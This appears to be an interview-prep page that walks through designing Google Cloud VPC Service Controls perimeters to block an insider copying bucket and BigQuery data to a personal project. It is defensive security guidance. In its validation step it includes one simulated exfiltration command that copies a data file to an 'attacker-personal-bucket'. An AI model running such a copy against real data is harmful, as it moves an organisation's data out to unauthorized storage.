⚡ ~/naveed Interview Prep
⚡ Portfolio Home ✍️ Engineering Blog Deep Dives 🎯 Interview Hub 1,000+ Scenarios ☸️ Kubernetes Mastery Hub 24 Modules 🎮 DevOps Arcade & Quizzes Subnet Blitz ⚡ 🗺️ DevOps Roadmaps PDFs & Guides 🤖 Morpheus Analysis AI Quant ↗ 🛠️ Developer Tools Utilities 🧪 Labs & Experiments 📄 Interactive CV & Certs 🔗 All Links & Socials ⚡ Join The Dispatch (Weekly SRE Newsletter) →
← Back to All AWS & Cloud Architecture Interview Questions Scenario 155 of 186 in AWS & Cloud Architecture
Staff Cloud Architect GCP & Cloud Cloud Security & Governance Enterprise Security

Q: A rogue employee with legitimate Google Cloud IAM permissions attempts to copy sensitive customer data from a corporate Cloud Storage bucket and BigQuery dataset into their personal GCP project. Standard IAM allows this. How do you design and enforce VPC Service Controls (VPC-SC) to stop this exfiltration attack?

Architectural runbook for designing and rolling out Google Cloud VPC Service Controls (VPC-SC) security perimeters with dry-run audit logging, ingress/egress rules, and context-aware access to prevent data exfiltration.

#GCP #VPC Service Controls #Data Security #Access Context Manager #IAM #Compliance
🎙️ Candidate Opening & Architectural Context
"IAM permissions control WHO can access a resource, but they do NOT control WHERE data can be sent. A user with Storage Admin can copy objects between projects. We implemented VPC Service Controls to create a cryptographic perimeter around our multi-petabyte data lake."
Advertisement
⚡ Recommended Practice Lab

Want to master this scenario in a live sandbox? Stephane Maarek's AWS Certified DevOps Engineer Professional Masterclass on Udemy covers this exact problem with hands-on terminal drills.

🛠️ Production Runbook & Step-by-Step Resolution

1️⃣

Define Access Policy & Access Levels in Access Context Manager

Establish organizational identity policies and contextual requirements (IP, device health, corporate network):

  • Create Access Policy: Initialized organization-wide Access Policy via gcloud access-context-manager policies create --organization=ORG_ID --title='Enterprise Policy'.
  • Define Trusted Access Level: Created Access Level requiring corporate VPN IP addresses and managed device posture: gcloud access-context-manager levels create CorpNetwork --basic-level-spec=corp_ip_rule.yaml.
Pro Tip: Access Levels define contextual conditions under which callers are allowed to cross the perimeter boundary.
2️⃣

Establish Service Perimeter in Dry-Run Mode & Analyze Violations

Safely evaluate perimeter rules without breaking existing production pipelines:

  • Create Dry-Run Perimeter: Provisioned perimeter enclosing data projects and protecting services: storage.googleapis.com, bigquery.googleapis.com, pubsub.googleapis.com.
  • Command: gcloud access-context-manager perimeters dry-run create DataPerimeter --resources=projects/123456789 --restricted-services=storage.googleapis.com,bigquery.googleapis.com.
  • Analyze Audit Logs: Queried Cloud Logging for protoPayload.serviceData.vpcServiceControlsAuditInfo to identify legitimate cross-project dependencies that would have been blocked.
Pro Tip: Never enforce a VPC-SC perimeter immediately. Operating in dry-run mode for 2-4 weeks reveals hidden cross-project dependencies and prevents outages.
3️⃣

Design Ingress and Egress Perimeter Bridge Exceptions

Authorize specific, verified cross-perimeter communications for external vendors and analytics partners:

  • Ingress Rule: Allowed authorized external service accounts connecting from CorpNetwork access level to invoke BigQuery jobs.
  • Egress Rule: Allowed internal ETL workloads to write data exclusively to a designated partner GCP project storage bucket, while blocking all other external GCP projects.
Pro Tip: Egress rules strictly validate both the destination identity and the destination GCP project number, blocking arbitrary external buckets.
4️⃣

Enforce Perimeter & Validate Exfiltration Interception

Promote dry-run configuration to enforced state and verify rejection of unauthorized exfiltration attempts:

  • Enforce Perimeter: Committed dry-run changes: gcloud access-context-manager perimeters dry-run commit DataPerimeter.
  • Simulate Exfiltration: Attempted gsutil cp gs://prod-lake/data.parquet gs://attacker-personal-bucket/ from an authorized corporate compute instance. The request was blocked with HTTP 403 VPC Service Controls violation.
Pro Tip: VPC-SC is the only Google Cloud mechanism that prevents data movement outside authorized boundaries even when IAM permissions are fully granted.
💡 The Senior SRE Gold Nugget (Key Architectural Takeaway)
"IAM controls identity authentication, but VPC Service Controls encloses Google API services inside network perimeters, eliminating data exfiltration risks to unauthorized GCP projects."
⚡ 60-Second Elevator Pitch Talking Points
  • Establish organization-level Access Context Manager policies and trusted IP access levels.
  • Deploy VPC-SC perimeters in Dry-Run mode around Cloud Storage, BigQuery, and Pub/Sub.
  • Analyze Cloud Logging VPC-SC violation telemetry to craft precise Ingress and Egress exception rules.
  • Commit dry-run to enforced state to block all cross-project data copies to external personal accounts.
Advertisement
Want more AWS & Cloud Architecture scenarios?
Explore our complete collection of scenario-based AWS & Cloud Architecture interview runbooks.
Browse All AWS & Cloud Architecture Questions →